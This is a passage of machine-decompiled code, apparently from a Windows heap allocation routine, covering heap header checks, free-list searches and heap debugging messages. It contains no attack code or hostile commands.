				_push(0x51afc88);
				_push(0x51217f0);
				_push( *[fs:0x0]);
				_t1937 = _t1936 - 0x1a0;
				_push(_t1873);
				_t1068 =  *0x51cd360;
				_v12 = _v12 ^ _t1068;
				_push(_t1068 ^ _t1935);
				 *[fs:0x0] =  &_v20;
				_v96 = __edx;
				_t1871 = __ecx;
				_v280 = __ecx;
				_v196 = 0;
				_v104 = 1;
				_v53 = 0;
				_v80 = 0;
				_v60 = 0;
				_v180 = 0;
				_t1518 = _a8 >> 3;
				if((__edx & 0x7d010f60) != 0 || _a4 >= 0x80000000) {
					_v104 = 0;
					 *_a16 = 4;
					_t1072 = _a4;
					__eflags = _t1072 - 0x7fffffff;
					if(_t1072 > 0x7fffffff) {
						_t1073 = 0;
						goto L157;
					}
					__eflags = _t1725 & 0x61000000;
					if((_t1725 & 0x61000000) != 0) {
						__eflags = _t1725 & 0x10000000;
						if(__eflags != 0) {
							goto L287;
						}
						_t1073 = E05192D82(_t1518, _t1540, _t1725, _t1871, _t1873, __eflags, _t1072);
						goto L157;
					}
					L287:
					__eflags = _t1072;
					if(_t1072 == 0) {
						_t1072 = 1;
					}
					_t1728 =  *((intOrPtr*)(_t1871 + 0x94)) + _t1072 &  *(_t1871 + 0x98);
					__eflags = _t1728 - 0x10;
					if(_t1728 < 0x10) {
						_t1728 = 0x10;
					}
					_a8 = _t1728;
					_t1074 = _v96;
					_t1546 = _t1074 >> 0x00000004 & 0xffffffe1 | 0x00000001;
					_v64 = _t1546;
					__eflags = _t1074 & 0x3c000100;
					if((_t1074 & 0x3c000100) == 0) {
						__eflags =  *(_t1871 + 0xbc);
						if( *(_t1871 + 0xbc) == 0) {
							goto L291;
						}
						goto L290;
					} else {
						L290:
						_t1546 = _t1546 | 0x00000002;
						_v64 = _t1546;
						_t1728 = _t1728 + 8;
						__eflags = _t1728;
						_a8 = _t1728;
						L291:
						_t1729 = _t1728 >> 3;
						_v52 = _t1729;
						goto L4;
					}
				} else {
					_t1546 = 1;
					_v64 = 1;
					_t1729 = _t1518;
					_v52 = _t1729;
					if(_t1729 < 2) {
						_a8 = _a8 + 8;
						_t1729 = 2;
						_v52 = 2;
					}
					 *_a16 = 3;
					_t1074 = _v96;
					L4:
					_t1876 = _t1074 & 0x00800000;
					if(_t1876 != 0) {
						_t1075 =  *[fs:0x30];
						__eflags =  *(_t1075 + 0x68) & 0x00000800;
						_t1074 = _v96;
						if(( *(_t1075 + 0x68) & 0x00000800) == 0) {
							_t1546 = _t1546 | 0x00000008;
							_v64 = _t1546;
						}
					}
					_v8 = 0;
					_t1946 = _t1074 & 0x00000001;
					if(_t1946 != 0) {
						L11:
						if(_t1729 >  *((intOrPtr*)(_t1871 + 0x5c))) {
							__eflags =  *(_t1871 + 0x40) & 0x00000002;
							if(( *(_t1871 + 0x40) & 0x00000002) == 0) {
								_v148 = 0xc0000023;
								L363:
								_v80 = 0;
								goto L153;
							}
							_t1521 = _a8 + 0x18;
							_a8 = _t1521;
							_a8 = _t1521;
							_t1880 = (E05101164(_t1546) & 0x0000000f) << 0xc;
							_v352 = _t1880;
							_v200 = 0;
							_v204 = _a8 + 0x1000 + _t1880;
							_t1732 = 1;
							_t1546 = _t1871;
							_t1518 = E05100678(_t1871, 1);
							_v356 = _t1518;
							_push(_t1518);
							_push(0x2000);
							_push( &_v204);
							_push(0);
							_push( &_v200);
							_push(0xffffffff);
							_t1074 = E05119660();
							_v148 = _t1074;
							__eflags = _t1074;
							if(_t1074 < 0) {
								goto L153;
							}
							_v60 = _v200 + _t1880;
							_push(_t1518);
							_push(0x1000);
							_push( &_a8);
							_push(0);
							_push( &_v60);
							_push(0xffffffff);
							_t1074 = E05119660();
							_v148 = _t1074;
							__eflags = _t1074;
							if(_t1074 < 0) {
								_v60 = 0;
								 *((intOrPtr*)(_t1871 + 0x214)) =  *((intOrPtr*)(_t1871 + 0x214)) + 1;
								goto L363;
							}
							 *((short*)(_v60 + 0x18)) = _a8 - _a4;
							 *(_v60 + 0x1a) = _v64 | 0x00000002;
							 *(_v60 + 0x10) = _a8;
							 *((intOrPtr*)(_v60 + 0x14)) = _v204;
							 *((char*)(_v60 + 0x1f)) = 4;
							 *((intOrPtr*)(_t1871 + 0x1f0)) =  *((intOrPtr*)(_t1871 + 0x1f0)) + _a8;
							_t1097 = E050F7D50();
							__eflags = _t1097;
							if(_t1097 != 0) {
								_t1100 =  *( *[fs:0x30] + 0x50) + 0x226;
							} else {
								_t1100 = 0x7ffe0380;
							}
							__eflags =  *_t1100;
							if( *_t1100 != 0) {
								_t1101 =  *[fs:0x30];
								__eflags =  *(_t1101 + 0x240) & 0x00000001;
								if(( *(_t1101 + 0x240) & 0x00000001) != 0) {
									_t1732 = _v60;
									E0519138A(_t1518, _t1871, _v60, _a8, 9);
								}
							}
							_t1102 = E050F7D50();
							__eflags = _t1102;
							if(_t1102 != 0) {
								_t1105 =  *( *[fs:0x30] + 0x50) + 0x226;
							} else {
								_t1105 = 0x7ffe0380;
							}
							__eflags =  *_t1105;
							if( *_t1105 != 0) {
								_t1106 =  *[fs:0x30];
								__eflags =  *(_t1106 + 0x240) & 0x00000001;
								if(( *(_t1106 + 0x240) & 0x00000001) != 0) {
									__eflags = E050F7D50();
									if(__eflags == 0) {
										_t1137 = 0x7ffe0380;
									} else {
										_t1137 =  *( *[fs:0x30] + 0x50) + 0x226;
									}
									_t1732 = _v60;
									E05191582(_t1518, _t1871, _v60, __eflags, _a8,  *(_t1871 + 0x74) << 3,  *_t1137 & 0x000000ff);
								}
							}
							_t1107 = E050F7D50();
							__eflags = _t1107;
							if(_t1107 != 0) {
								_t1110 =  *( *[fs:0x30] + 0x50) + 0x230;
							} else {
								_t1110 = 0x7ffe038a;
							}
							__eflags =  *_t1110;
							if( *_t1110 != 0) {
								__eflags = E050F7D50();
								if(__eflags == 0) {
									_t1112 = 0x7ffe038a;
								} else {
									_t1112 =  *( *[fs:0x30] + 0x50) + 0x230;
								}
								_t1732 = _v60;
								E05191582(_t1518, _t1871, _v60, __eflags, _a8,  *(_t1871 + 0x74) << 3,  *_t1112 & 0x000000ff);
							}
							__eflags =  *(_t1871 + 0x40) & 0x08000000;
							if(( *(_t1871 + 0x40) & 0x08000000) != 0) {
								_t1559 = E051016C7(1, _t1732) & 0x0000ffff;
								_v206 = _t1559;
								 *(_v60 + 8) = _t1559;
							}
							_t1120 =  *( *[fs:0x30] + 0x68);
							_v360 = _t1120;
							__eflags = _t1120 & 0x00000800;
							if((_t1120 & 0x00000800) != 0) {
								 *((short*)(_v60 + 0xa)) = E0517E9F0(_t1871, _v96 >> 0x00000012 & 0x000000ff, 0,  *(_v60 + 0x10) >> 3, 1);
							}
							_t1546 = _v60;
							__eflags =  *(_t1871 + 0x4c);
							if( *(_t1871 + 0x4c) != 0) {
								 *(_t1546 + 0x1b) =  *(_t1546 + 0x1a) ^  *(_t1546 + 0x19) ^  *(_t1546 + 0x18);
								_t737 = _t1546 + 0x18;
								 *_t737 =  *(_t1546 + 0x18) ^  *(_t1871 + 0x50);
								__eflags =  *_t737;
								_t1546 = _v60;
							}
							_t1127 = _t1871 + 0x9c;
							_t1734 =  *(_t1127 + 4);
							_t1881 =  *_t1734;
							__eflags = _t1881 - _t1127;
							if(_t1881 != _t1127) {
								_push(_t1546);
								_t1546 = 0xd;
								E0519A80D(0, _t1127, 0, _t1881);
							} else {
								 *_t1546 = _t1127;
								 *(_t1546 + 4) = _t1734;
								 *_t1734 = _t1546;
								 *(_t1127 + 4) = _t1546;
							}
							_t1074 = _v60 + 0x20;
							_v80 = _v60 + 0x20;
							goto L153;
						}
						if(_t1876 != 0) {
							L21:
							_t1145 = _a12;
							if(_t1145 == 0) {
								L23:
								_v228 = _t1871 + 0xc0;
								_t1564 =  *(_t1871 + 0xb4);
								_v36 = _t1564;
								while(1) {
									_t1522 =  *((intOrPtr*)(_t1564 + 4));
									if(_t1729 < _t1522) {
										_t1523 = _t1729;
										goto L26;
									}
									_t1147 =  *_t1564;
									__eflags = _t1147;
									if(_t1147 == 0) {
										_t1523 = _t1522 - 1;
										while(1) {
											L26:
											_v144 = _t1523;
											_t1524 = _t1523 -  *(_t1564 + 0x14);
											_t1882 = 0;
											_t1736 =  *(_t1564 + 0x18);
											_v40 = _t1736;
											_t1148 =  *((intOrPtr*)(_t1736 + 4));
											if(_t1736 == _t1148) {
												goto L311;
											}
											_t1424 = _t1148 + 0xfffffff8;
											_v32 = _t1424;
											_t1425 =  *_t1424;
											_v380 = _t1425;
											_t1671 = _t1425 & 0x0000ffff;
											if( *(_t1871 + 0x4c) != 0) {
												_t1846 =  *(_t1871 + 0x50) ^ _t1425;
												_v380 = _t1846;
												_t1453 = _t1846 & 0x0000ffff;
												_v44 = _t1453;
												_v68 = _t1453 & 0x0000ffff;
												_t1705 = _t1846 >> 0x00000010 ^ _t1846 >> 0x00000008 ^ _t1846;
												if(_t1846 >> 0x18 != _t1705) {
													_push(_t1705);
													E0519A80D(_t1871, _v32, 0, 0);
													_t1671 = _v44 & 0x0000ffff;
												} else {
													_t1671 = _v68;
												}
												_t1736 = _v40;
											}
											_t1673 = _v52 - (_t1671 & 0x0000ffff);
											_v300 = _t1673;
											if(_t1673 > 0) {
												_t1882 = _t1736;
												goto L48;
											} else {
												_t1428 =  *_t1736 + 0xfffffff8;
												_v32 = _t1428;
												_t1429 =  *_t1428;
												_v388 = _t1429;
												_t1674 = _t1429 & 0x0000ffff;
												if( *(_t1871 + 0x4c) != _t1882) {
													_t1842 =  *(_t1871 + 0x50) ^ _t1429;
													_v388 = _t1842;
													_t1447 = _t1842 & 0x0000ffff;
													_v44 = _t1447;
													_v68 = _t1447 & 0x0000ffff;
													_t1700 = _t1842 >> 0x00000010 ^ _t1842 >> 0x00000008 ^ _t1842;
													if(_t1842 >> 0x18 != _t1700) {
														_push(_t1700);
														E0519A80D(_t1871, _v32, 0, 0);
														_t1674 = _v44 & 0x0000ffff;
													} else {
														_t1674 = _v68;
													}
													_t1736 = _v40;
												}
												_t1676 = _v52 - (_t1674 & 0x0000ffff);
												_v304 = _t1676;
												_t1564 = _v36;
												if(_t1676 <= 0) {
													_t1882 =  *_t1736;
													goto L49;
												} else {
													if( *_t1564 != _t1882 || _v144 !=  *((intOrPtr*)(_t1564 + 4)) - 1) {
														_t1432 = _t1524 >> 5;
														_t1921 = ( *((intOrPtr*)(_t1564 + 4)) -  *(_t1564 + 0x14) >> 5) - 1;
														_t1836 =  *((intOrPtr*)(_t1564 + 0x1c)) + _t1432 * 4;
														_v32 = _t1524 & 0x0000001f;
														_t1535 =  !((1 << _v32) - 1) &  *_t1836;
														while(1) {
															_v224 = _t1836;
															_v184 = _t1432;
															if(_t1535 != 0) {
																break;
															}
															if(_t1432 > _t1921) {
																__eflags = _t1535;
																if(_t1535 != 0) {
																	break;
																}
																_t1564 = _v36;
																goto L167;
															} else {
																_t1836 =  &(_t1836[1]);
																_t1535 =  *_t1836;
																_t1432 = _t1432 + 1;
																continue;
															}
														}
														__eflags = _t1535;
														if(_t1535 != 0) {
															_t1678 = _t1535 & 0x000000ff;
															__eflags = _t1535;
															if(_t1535 == 0) {
																_t1681 = ( *((_t1535 >> 0x00000008 & 0x000000ff) + 0x50b84d0) & 0x000000ff) + 8;
															} else {
																_t1681 =  *(_t1678 + 0x50b84d0) & 0x000000ff;
															}
														} else {
															_t1686 = _t1535 >> 0x00000010 & 0x000000ff;
															__eflags = _t1686;
															if(_t1686 != 0) {
																_t1681 = ( *(_t1686 + 0x50b84d0) & 0x000000ff) + 0x10;
															} else {
																_t97 = (_t1535 >> 0x18) + 0x50b84d0; // 0x10008
																_t1681 = ( *_t97 & 0x000000ff) + 0x18;
																__eflags = _t1681;
															}
														}
														_t1434 = (_t1432 << 5) + _t1681;
														_v184 = _t1434;
														_t1682 = _v36;
														__eflags =  *(_t1682 + 8);
														if( *(_t1682 + 8) != 0) {
															_t1434 = _t1434 + _t1434;
														}
														_t1882 =  *( *((intOrPtr*)(_t1682 + 0x20)) + _t1434 * 4);
														goto L48;
													} else {
														__eflags =  *((intOrPtr*)(_t1564 + 8)) - _t1882;
														if( *((intOrPtr*)(_t1564 + 8)) != _t1882) {
															_t1524 = _t1524 + _t1524;
														}
														_t1538 =  *( *((intOrPtr*)(_t1564 + 0x20)) + _t1524 * 4);
														while(1) {
															__eflags = _t1736 - _t1538;
															if(_t1736 == _t1538) {
																break;
															}
															_t1438 =  *(_t1538 - 8);
															_v396 = _t1438;
															_t1689 = _t1438 & 0x0000ffff;
															__eflags =  *(_t1871 + 0x4c) - _t1882;
															if( *(_t1871 + 0x4c) != _t1882) {
																_t1838 =  *(_t1871 + 0x50) ^ _t1438;
																_v396 = _t1838;
																_t1440 = _t1838 & 0x0000ffff;
																_v32 = _t1440;
																_v44 = _t1440 & 0x0000ffff;
																_t1695 = _t1838 >> 0x00000010 ^ _t1838 >> 0x00000008 ^ _t1838;
																__eflags = _t1838 >> 0x18 - _t1695;
																if(_t1838 >> 0x18 != _t1695) {
																	_push(_t1695);
																	E0519A80D(_t1871, _t1538 - 8, 0, 0);
																	_t1689 = _v32 & 0x0000ffff;
																} else {
																	_t1689 = _v44;
																}
																_t1736 = _v40;
															}
															_t1691 = _v52 - (_t1689 & 0x0000ffff);
															_v308 = _t1691;
															__eflags = _t1691;
															if(_t1691 > 0) {
																_t1538 =  *_t1538;
																continue;
															} else {
																_t1882 = _t1538;
																break;
															}
														}
														L48:
														_t1564 = _v36;
														L49:
														__eflags = _t1882;
														if(_t1882 == 0) {
															L167:
															_t1564 =  *_t1564;
															_v36 = _t1564;
															_t1523 =  *(_t1564 + 0x14);
															continue;
														}
														_v312 = _t1882;
														__eflags = _v228 - _t1882;
														if(_v228 == _t1882) {
															L248:
															_t1546 = _t1871;
															_t1518 = E050FB236(_t1871, _a8);
															_v100 = _t1518;
															__eflags = _t1518;
															if(_t1518 == 0) {
																_v148 = 0xc0000017;
																goto L363;
															}
															_t540 = _t1518 + 8; // 0x8
															_t1738 = _t540;
															_t1883 =  *_t1738;
															_v32 = _t1883;
															_t1565 =  *(_t1518 + 0xc);
															_v88 = _t1565;
															_t1149 =  *_t1565;
															_t1566 =  *(_t1883 + 4);
															_v44 = _t1566;
															__eflags = _t1149 - _t1566;
															_t1567 = _v88;
															if(_t1149 != _t1566) {
																L536:
																_push(_t1567);
																_t1546 = 0xd;
																_t1074 = E0519A80D(_t1871, _t1738, _v44, _t1149);
																_v73 = 0;
																goto L153;
															}
															__eflags = _t1149 - _t1738;
															if(_t1149 != _t1738) {
																goto L536;
															}
															 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1518 & 0x0000ffff);
															_t1740 =  *(_t1871 + 0xb4);
															__eflags = _t1740;
															if(_t1740 == 0) {
																L258:
																 *_t1567 = _t1883;
																 *(_t1883 + 4) = _t1567;
																__eflags =  *(_t1518 + 2) & 0x00000008;
																if(( *(_t1518 + 2) & 0x00000008) != 0) {
																	_t1151 = E050FA229(_t1871, _t1518);
																	__eflags = _t1151;
																	if(_t1151 != 0) {
																		goto L259;
																	}
																	_t1546 = _t1871;
																	_t1074 = E050FA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
																	_v73 = 0;
																	goto L153;
																}
																L259:
																_v73 = 1;
																L76:
																_t1569 =  *(_t1518 + 2);
																_v71 = _t1569;
																__eflags = _v104;
																if(_v104 == 0) {
																	__eflags = _t1569 & 0x00000004;
																	if((_t1569 & 0x00000004) != 0) {
																		_t1905 = ( *_t1518 & 0x0000ffff) * 8 - 0x10;
																		_v244 = _t1905;
																		__eflags = _t1569 & 0x00000002;
																		if((_t1569 & 0x00000002) != 0) {
																			__eflags = _t1905 - 4;
																			if(_t1905 > 4) {
																				_t1905 = _t1905 - 4;
																				__eflags = _t1905;
																				_v244 = _t1905;
																			}
																		}
																		_t872 = _t1518 + 0x10; // 0x10
																		_t1373 = E0512D540(_t872, _t1905, 0xfeeefeee);
																		_v32 = _t1373;
																		__eflags = _t1373 - _t1905;
																		if(_t1373 != _t1905) {
																			_t1651 =  *[fs:0x30];
																			__eflags =  *(_t1651 + 0xc);
																			if( *(_t1651 + 0xc) == 0) {
																				_push("HEAP: ");
																				E050DB150();
																				_t1941 = _t1937 + 4;
																			} else {
																				E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																				_t1941 = _t1937 + 8;
																			}
																			_t1569 = _v100;
																			_push(_v32 + 0x10 + _t1569);
																			E050DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1569);
																			_t1937 = _t1941 + 0xc;
																			_t1379 =  *[fs:0x30];
																			__eflags =  *((char*)(_t1379 + 2));
																			if( *((char*)(_t1379 + 2)) == 0) {
																				_t1518 = _v100;
																			} else {
																				 *0x51c6378 = 1;
																				_t1518 = _v100;
																				 *0x51c60c0 = _t1518;
																				asm("int3");
																				 *0x51c6378 = 0;
																			}
																		}
																	}
																}
																_v120 = _t1518;
																__eflags =  *(_t1518 + 2) & 0x00000001;
																if(( *(_t1518 + 2) & 0x00000001) != 0) {
																	_push(_t1569);
																	_t1546 = 3;
																	_t1074 = E0519A80D(_t1871, _t1518, 0, 0);
																	goto L153;
																} else {
																	 *(_t1518 + 2) = _v64;
																	_t1571 = _v52;
																	_t1885 = ( *_t1518 & 0x0000ffff) - _t1571;
																	_v320 = _t1885;
																	 *_t1518 = _t1571;
																	_t1743 = _a4;
																	_t1153 = _a8 - _t1743;
																	_v44 = _t1153;
																	__eflags = _t1153 - 0x3f;
																	if(_t1153 >= 0x3f) {
																		 *(_t1518 + _t1571 * 8 - 4) = _t1153;
																		 *(_t1518 + 7) = 0x3f;
																	} else {
																		 *(_t1518 + 7) = _t1153;
																	}
																	 *(_t1518 + 3) = 0;
																	__eflags = _t1885;
																	if(_t1885 == 0) {
																		L137:
																		_t1886 = _v120;
																		_v80 =  &(_t1886[4]);
																		_t1518 = ( *_t1886 & 0x0000ffff) * 8;
																		_v196 = _t1518;
																		__eflags = (_t1886[3] & 0x0000003f) - 0x3f;
																		if((_t1886[3] & 0x0000003f) == 0x3f) {
																			_t1158 = 1;
																		} else {
																			_t1158 = 0;
																			__eflags = 0;
																		}
																		_t1546 = _t1518;
																		__eflags = _t1158;
																		if(_t1158 != 0) {
																			_t1007 = _t1518 - 4; // -4
																			_t1546 = _t1007;
																			_t1518 = _t1546;
																			_v196 = _t1518;
																		}
																		__eflags = _v104;
																		if(_v104 == 0) {
																			_t1744 = _v96;
																			__eflags = _t1744 & 0x00000008;
																			if((_t1744 & 0x00000008) == 0) {
																				__eflags =  *(_t1871 + 0x40) & 0x00000040;
																				if(( *(_t1871 + 0x40) & 0x00000040) == 0) {
																					L296:
																					_t1525 = _a4;
																					L297:
																					__eflags =  *(_t1871 + 0x40) & 0x00000020;
																					if(( *(_t1871 + 0x40) & 0x00000020) != 0) {
																						_t1159 = _v80;
																						 *((intOrPtr*)(_t1159 + _t1525)) = 0xabababab;
																						 *((intOrPtr*)(_t1159 + _t1525 + 4)) = 0xabababab;
																						 *(_v120 + 2) =  *(_v120 + 2) | 0x00000004;
																					}
																					_t1887 = _v120;
																					 *(_t1887 + 3) = 0;
																					__eflags =  *(_t1887 + 2) & 0x00000002;
																					if(( *(_t1887 + 2) & 0x00000002) == 0) {
																						_t1074 =  *( *[fs:0x30] + 0x68);
																						_v348 = _t1074;
																						__eflags = _t1074 & 0x00000800;
																						if((_t1074 & 0x00000800) == 0) {
																							goto L301;
																						}
																						_t1518 = _v120;
																						_t1546 = _t1871;
																						 *(_t1887 + 3) = E0517E9F0(_t1871, _t1744 >> 0x00000012 & 0x000000ff, 0,  *_t1518 & 0x0000ffff, 0);
																						goto L302;
																					} else {
																						_t1546 = _t1887;
																						_t1526 = E050D1F5B(_t1887);
																						_v276 = _t1526;
																						 *_t1526 = 0;
																						 *((intOrPtr*)(_t1526 + 4)) = 0;
																						__eflags =  *(_t1871 + 0x40) & 0x08000000;
																						if(( *(_t1871 + 0x40) & 0x08000000) != 0) {
																							_t1546 = 1;
																							 *_t1526 = E051016C7(1, _t1744);
																							_t1744 = _v96;
																						}
																						_t1074 =  *( *[fs:0x30] + 0x68);
																						_v344 = _t1074;
																						__eflags = _t1074 & 0x00000800;
																						if((_t1074 & 0x00000800) != 0) {
																							_t1518 = _v120;
																							_t1074 = E0517E9F0(_t1871, _t1744 >> 0x00000012 & 0x00000fff, 0,  *_t1518 & 0x0000ffff, 0);
																							_t1546 = _v276;
																							 *(_v276 + 2) = _t1074;
																							goto L302;
																						} else {
																							L301:
																							_t1518 = _v120;
																							L302:
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) != 0) {
																								 *(_t1887 + 3) =  *(_t1518 + 1) ^  *_t1518 ^  *(_t1887 + 2);
																								_t1074 =  *(_t1871 + 0x50);
																								 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
																							}
																							goto L153;
																						}
																					}
																				}
																				_t1525 = _a4;
																				E0512D5E0(_v80, _t1525 & 0xfffffffc, 0xbaadf00d);
																				_t1744 = _v96;
																				goto L297;
																			}
																			_t618 = _t1546 - 8; // -8
																			E0511FA60(_v80, 0, _t618);
																			_t1744 = _v96;
																			goto L296;
																		} else {
																			__eflags =  *(_t1871 + 0x4c);
																			if( *(_t1871 + 0x4c) != 0) {
																				_t1889 = _v120;
																				_t1889[0] = _t1889[0] ^ _t1889[0] ^  *_t1889;
																				 *_t1889 =  *_t1889 ^  *(_t1871 + 0x50);
																				__eflags =  *_t1889;
																			}
																			__eflags = _v53;
																			if(_v53 == 0) {
																				L152:
																				_t1074 = _v96;
																				__eflags = _t1074 & 0x00000008;
																				if((_t1074 & 0x00000008) != 0) {
																					_t398 = _t1518 - 8; // -8
																					_t1074 = E0511FA60(_v80, 0, _t398);
																				}
																				goto L153;
																			} else {
																				__eflags =  *(_t1871 + 0x44) & 0x01000000;
																				if(( *(_t1871 + 0x44) & 0x01000000) != 0) {
																					L149:
																					_t1888 =  *(_t1871 + 0xc8);
																					_t360 = _t1888 + 8;
																					 *_t360 =  *(_t1888 + 8) + 0xffffffff;
																					__eflags =  *_t360;
																					if( *_t360 != 0) {
																						L151:
																						_v53 = 0;
																						goto L152;
																					}
																					 *(_t1888 + 0xc) = 0;
																					_t1546 = _t1546 | 0xffffffff;
																					asm("lock cmpxchg [edx], ecx");
																					_t1750 = 0xfffffffe;
																					_v104 = 0xfffffffe;
																					__eflags = 0xfffffffe - 0xfffffffe;
																					if(0xfffffffe != 0xfffffffe) {
																						__eflags =  *(_t1888 + 4) & 0x00000001;
																						if(__eflags != 0) {
																							_push(_t1888);
																							E0516FF10(_t1518, 0xfffffffe, _t1871, _t1888, __eflags);
																							_t1750 = _v104;
																						}
																						while(1) {
																							__eflags = _t1750 & 0x00000002;
																							if((_t1750 & 0x00000002) == 0) {
																								_t1179 = 1;
																							} else {
																								_t1179 = 3;
																							}
																							_v88 = _t1179;
																							_t1546 = _t1179 + _t1750;
																							_t1180 = _t1750;
																							asm("lock cmpxchg [edx], ecx");
																							__eflags = _t1180 - _v104;
																							if(_t1180 == _v104) {
																								break;
																							}
																							_t1750 = _t1180;
																							_v104 = _t1750;
																						}
																						__eflags = _v88 & 0x00000002;
																						if((_v88 & 0x00000002) != 0) {
																							E050D4DC0(_t1546, _t1888);
																						}
																					}
																					goto L151;
																				}
																				 *(_t1871 + 0x21c) =  *(_t1871 + 0x21c) + 1;
																				_t1546 =  *(_t1871 + 0x224);
																				__eflags =  *(_t1871 + 0x21c) - _t1546;
																				if( *(_t1871 + 0x21c) > _t1546) {
																					 *(_t1871 + 0x21c) = 0;
																					_t1753 =  *((intOrPtr*)(_t1871 + 0x1e8)) - ( *(_t1871 + 0x74) << 3);
																					__eflags = _t1753 -  *((intOrPtr*)(_t1871 + 0x238));
																					if(_t1753 >  *((intOrPtr*)(_t1871 + 0x238))) {
																						 *((intOrPtr*)(_t1871 + 0x238)) = _t1753;
																					}
																					 *((intOrPtr*)(_t1871 + 0x23c)) = _t1753;
																				}
																				 *(_t1871 + 0x228) =  *(_t1871 + 0x228) + 1;
																				__eflags =  *(_t1871 + 0x228) - 0x1000;
																				if( *(_t1871 + 0x228) >= 0x1000) {
																					__eflags =  *((char*)(_t1871 + 0xda)) - 2;
																					if( *((char*)(_t1871 + 0xda)) != 2) {
																						L364:
																						_t1182 = 0x10;
																						L360:
																						__eflags =  *(_t1871 + 0x220) - _t1182;
																						if( *(_t1871 + 0x220) > _t1182) {
																							__eflags = _t1546 - 0x10000;
																							if(_t1546 < 0x10000) {
																								 *(_t1871 + 0x224) = _t1546 + _t1546;
																							}
																						}
																						 *(_t1871 + 0x220) = 0;
																						 *(_t1871 + 0x228) = 0;
																						goto L149;
																					}
																					__eflags =  *((intOrPtr*)(_t1871 + 0x22c)) - 0x10;
																					if( *((intOrPtr*)(_t1871 + 0x22c)) <= 0x10) {
																						goto L364;
																					}
																					_t1182 = 0x100;
																					goto L360;
																				} else {
																					goto L149;
																				}
																			}
																		}
																	} else {
																		__eflags = _t1885 - 1;
																		if(_t1885 == 1) {
																			 *_t1518 =  *_t1518 + 1;
																			_t1192 = _a8 - _t1743 + 8;
																			_v68 = _t1192;
																			__eflags = _t1192 - 0x3f;
																			if(_t1192 >= 0x3f) {
																				 *(_t1518 + 4 + _t1571 * 8) = _t1192;
																				 *(_t1518 + 7) = 0x3f;
																			} else {
																				 *(_t1518 + 7) = _t1192;
																			}
																			goto L137;
																		}
																		__eflags = _v104;
																		if(_v104 == 0) {
																			_t1754 = 1;
																		} else {
																			_t1754 = 0;
																			__eflags = 0;
																		}
																		_v116 = _t1754;
																		_t1193 =  *((intOrPtr*)(_t1518 + 6));
																		__eflags = _t1193;
																		if(_t1193 != 0) {
																			_t1576 = (1 - (_t1193 & 0x000000ff) << 0x10) + (_t1518 & 0xffff0000);
																			_v48 = 1;
																		} else {
																			_t1576 = _t1871;
																			_v48 = _t1871;
																		}
																		_v248 = _t1576;
																		_v32 = _t1885;
																		_t1518 = _t1518 + _v52 * 8;
																		_v88 = 0;
																		 *(_t1518 + 2) = _v71;
																		 *(_t1518 + 7) = 0;
																		 *(_t1518 + 4) =  *(_t1871 + 0x54) ^ _v52;
																		__eflags =  *((intOrPtr*)(_t1576 + 0x18)) - _v48;
																		if( *((intOrPtr*)(_t1576 + 0x18)) != _v48) {
																			_t1205 = (_t1518 - _v48 >> 0x10) + 1;
																			_v32 = _t1205;
																			_v108 = _t1205;
																			__eflags = _t1205 - 0xfe;
																			if(_t1205 >= 0xfe) {
																				_push(_t1576);
																				E0519A80D( *((intOrPtr*)(_t1576 + 0x18)), _t1518, _t1576, 0);
																				_t1754 = _v116;
																				_t1205 = _v32;
																			}
																		} else {
																			_t1205 = 0;
																			__eflags = 0;
																		}
																		_v110 = _t1205;
																		 *((char*)(_t1518 + 6)) = _t1205;
																		 *(_t1518 + 3) = 0;
																		 *_t1518 = _t1885;
																		while(1) {
																			_t1577 = _t1518 + _t1885 * 8;
																			_t1209 =  *(_t1871 + 0x4c) >> 0x00000014 &  *(_t1871 + 0x52) ^ _t1577[1];
																			__eflags = _t1209 & 0x00000001;
																			if((_t1209 & 0x00000001) != 0) {
																				break;
																			}
																			__eflags =  *(_t1871 + 0x4c);
																			if( *(_t1871 + 0x4c) != 0) {
																				_t1760 =  *(_t1871 + 0x50) ^  *_t1577;
																				 *_t1577 = _t1760;
																				_t1599 = _t1760 >> 0x00000010 ^ _t1760 >> 0x00000008 ^ _t1760;
																				__eflags = _t1760 >> 0x18 - _t1599;
																				if(__eflags != 0) {
																					_push(_t1599);
																					E0518FA2B(_t1518, _t1871, _t1518 + _t1885 * 8, _t1871, _t1885, __eflags);
																				}
																				_t1577 = _t1518 + _t1885 * 8;
																			}
																			_t762 =  &(_t1577[4]); // 0x50f47f1
																			_t1755 = _t762;
																			_v32 = _t1755;
																			_v48 =  *_t1755;
																			_t765 =  &(_t1577[6]); // 0x18a164ff
																			_t1211 =  *_t765;
																			_v44 = _t1211;
																			_t1212 =  *_t1211;
																			_t768 = _v48 + 4; // 0x1475ffec
																			__eflags = _t1212 -  *_t768;
																			_t769 =  &(_t1577[4]); // 0x50f47f1
																			_t1757 = _t769;
																			if(_t1212 !=  *_t768) {
																				L523:
																				_push(_t1577);
																				_t998 = _v48 + 4; // 0x1475ffec
																				_t1546 = 0xd;
																				E0519A80D(_t1871, _t1757,  *_t998, _t1212);
																				goto L524;
																			} else {
																				__eflags = _t1212 - _t1757;
																				if(_t1212 != _t1757) {
																					goto L523;
																				}
																				 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1577 & 0x0000ffff);
																				_t1802 =  *(_t1871 + 0xb4);
																				__eflags = _t1802;
																				if(_t1802 == 0) {
																					L381:
																					_t1217 = _v48;
																					_t1803 = _v44;
																					 *_t1803 = _t1217;
																					 *((intOrPtr*)(_t1217 + 4)) = _t1803;
																					__eflags = _t1577[1] & 0x00000008;
																					if((_t1577[1] & 0x00000008) != 0) {
																						_t1218 = E050FA229(_t1871, _t1577);
																						__eflags = _t1218;
																						if(_t1218 != 0) {
																							goto L382;
																						}
																						_t1546 = _t1871;
																						E050FA309(_t1871, _t1518 + _t1885 * 8,  *(_t1518 + _t1885 * 8) & 0x0000ffff, 1);
																						L524:
																						_v72 = 0;
																						__eflags = _v88;
																						if(_v88 != 0) {
																							_v112 = 0;
																							 *( *[fs:0x18] + 0xbf4) = 0xc000003c;
																							_t1890 =  *[fs:0x18];
																							_v340 = _t1890;
																							 *((intOrPtr*)(_t1890 + 0x34)) = E050DCCC0(0xc000003c);
																							goto L153;
																						}
																						_v88 = 1;
